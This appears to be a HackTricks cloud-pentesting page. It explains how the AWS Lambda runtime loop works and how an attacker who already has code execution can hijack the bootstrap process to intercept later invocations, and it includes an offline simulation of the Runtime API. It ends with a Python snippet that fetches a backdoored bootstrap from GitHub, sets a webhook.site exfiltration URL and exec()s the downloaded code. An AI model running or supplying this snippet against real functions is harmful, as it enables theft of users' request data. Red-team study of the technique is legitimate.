AWS - Steal Lambda Requests
Reading time: 4 minutes
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Lambda Flow
- Slicer is a process outside the container that sends invocations to the init process.
- The init process listens on port 9001 exposing some interesting endpoints:
  - /2018-06-01/runtime/invocation/next – get the next invocation event
  - /2018-06-01/runtime/invocation/{invoke-id}/response – return the handler response for the invoke
  - /2018-06-01/runtime/invocation/{invoke-id}/error – return an execution error
- bootstrap.py has a loop getting invocations from the init process (/next) and calls the user's code to handle them.
- Finally, bootstrap.py sends the response to init.
Note that bootstrap loads the user code as a module, so any code execution performed by the user's code is actually happening in this process.
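To make the flow above concrete, here is an added, offline simulation of the Runtime API exchange (this is example code written for this page, not the HackTricks author's script and not AWS's bootstrap). A mock "init" process serves two constructed invocation events from /2018-06-01/runtime/invocation/next, and a minimal bootstrap-style loop fetches each one, runs a handler, and posts the result to /{invoke-id}/response or /{invoke-id}/error. The mock listens on an ephemeral localhost port instead of 9001, the event payloads are constructed, and a 410 reply on /next (used here only to stop the loop) is an assumption of this simulation, not a behaviour of the real init process:

```python
"""Offline simulation of the Lambda Runtime API loop (added example, not the page's code)."""
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from queue import Empty, Queue

API = "2018-06-01/runtime/invocation"

# Constructed invocation events the mock init process hands out.
EVENTS = [
    {"id": "req-0001", "body": {"action": "add", "a": 2, "b": 3}},
    {"id": "req-0002", "body": {"action": "boom"}},
]


class MockInit(BaseHTTPRequestHandler):
    """Stands in for the init process: serves /next, records /response and /error."""
    pending: "Queue[dict]"
    results: dict  # invoke-id -> (kind, payload) as posted by the bootstrap loop

    def log_message(self, *args):  # keep the simulation quiet
        pass

    def do_GET(self):
        if self.path != f"/{API}/next":
            self.send_error(404)
            return
        try:
            ev = self.pending.get(timeout=1)
        except Empty:
            self.send_error(410)  # assumption for this mock: no more work, stop the loop
            return
        body = json.dumps(ev["body"]).encode()
        self.send_response(200)
        # The real runtime API carries the invoke-id in this header.
        self.send_header("Lambda-Runtime-Aws-Request-Id", ev["id"])
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        # Expected path: 2018-06-01/runtime/invocation/{invoke-id}/response|error
        parts = self.path.strip("/").split("/")
        if len(parts) != 5 or parts[4] not in ("response", "error"):
            self.send_error(404)
            return
        length = int(self.headers.get("Content-Length", 0))
        payload = json.loads(self.rfile.read(length) or b"null")
        self.results[parts[3]] = (parts[4], payload)
        self.send_response(202)
        self.send_header("Content-Length", "0")
        self.end_headers()


def handler(event):
    """Constructed 'user code' for the example: one good path, one that raises."""
    if event.get("action") == "add":
        return {"sum": event["a"] + event["b"]}
    raise ValueError(f"unknown action {event.get('action')!r}")


def bootstrap_loop(base):
    """Mirrors what bootstrap.py does: fetch /next, run the handler, post the result."""
    handled = 0
    while True:
        try:
            with urllib.request.urlopen(f"{base}/{API}/next") as r:
                invoke_id = r.headers["Lambda-Runtime-Aws-Request-Id"]
                event = json.loads(r.read())
        except urllib.error.HTTPError as e:
            if e.code == 410:
                return handled
            raise
        try:
            out, kind = handler(event), "response"
        except Exception as exc:  # an execution error goes to /{invoke-id}/error
            out, kind = {"errorType": type(exc).__name__, "errorMessage": str(exc)}, "error"
        req = urllib.request.Request(
            f"{base}/{API}/{invoke_id}/{kind}", data=json.dumps(out).encode(),
            method="POST", headers={"Content-Type": "application/json"})
        urllib.request.urlopen(req).close()
        handled += 1


def simulate(events=EVENTS):
    """Run the mock init process and the bootstrap loop; return (count, results)."""
    MockInit.pending = Queue()
    MockInit.results = {}
    for ev in events:
        MockInit.pending.put(ev)
    srv = HTTPServer(("127.0.0.1", 0), MockInit)  # ephemeral port stands in for 9001
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        handled = bootstrap_loop(f"http://127.0.0.1:{srv.server_port}")
    finally:
        srv.shutdown()
    return handled, dict(MockInit.results)


if __name__ == "__main__":
    print(simulate())
```

Running it shows the two halves of the protocol the section describes: whoever owns the loop that calls /next is the process that receives the invocations, and init only sees the invoke-id plus a response or error for it, with no notion of which process answered.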
Stealing Lambda Requests
The goal of this attack is to make the user's code execute a malicious bootstrap.py process inside the bootstrap.py process that handles the vulnerable request. This way, the malicious bootstrap process will start talking with the init process to handle the requests while the legit bootstrap is trapped running the malicious one, so it won't ask the init process for requests.
This is a simple task to achieve as the user's code is being executed by the legit bootstrap.py process. So the attacker could:
- Send a fake result of the current invocation to the init process, so init thinks the bootstrap process is waiting for more invocations.
  - A request must be sent to /${invoke-id}/response
  - The invoke-id can be obtained from the stack of the legit bootstrap.py process using the inspect python module (as proposed here) or just by requesting it again from /2018-06-01/runtime/invocation/next (as proposed here).
- Execute a malicious bootstrap.py which will handle the next invocations.
  - For stealthiness purposes it's possible to send the lambda invocation parameters to an attacker-controlled C2 and then handle the requests as usual.
  - For this attack, it's enough to get the original code of bootstrap.py from the system or github, add the malicious code and run it from the current lambda invocation.
Attack Steps
- Find an RCE vulnerability.
- Generate a malicious bootstrap (e.g. https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)
- Execute the malicious bootstrap.
You can easily perform these actions running:
python3 <<EOF
import os
import urllib3
# Download backdoored bootstrap
http = urllib3.PoolManager()
backdoored_bootstrap_url = "https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py"
new_runtime = http.request('GET', backdoored_bootstrap_url).data
# Load new bootstrap
os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402a7c0"
exec(new_runtime)
EOF
For more info check https://github.com/carlospolop/lambda_bootstrap_switcher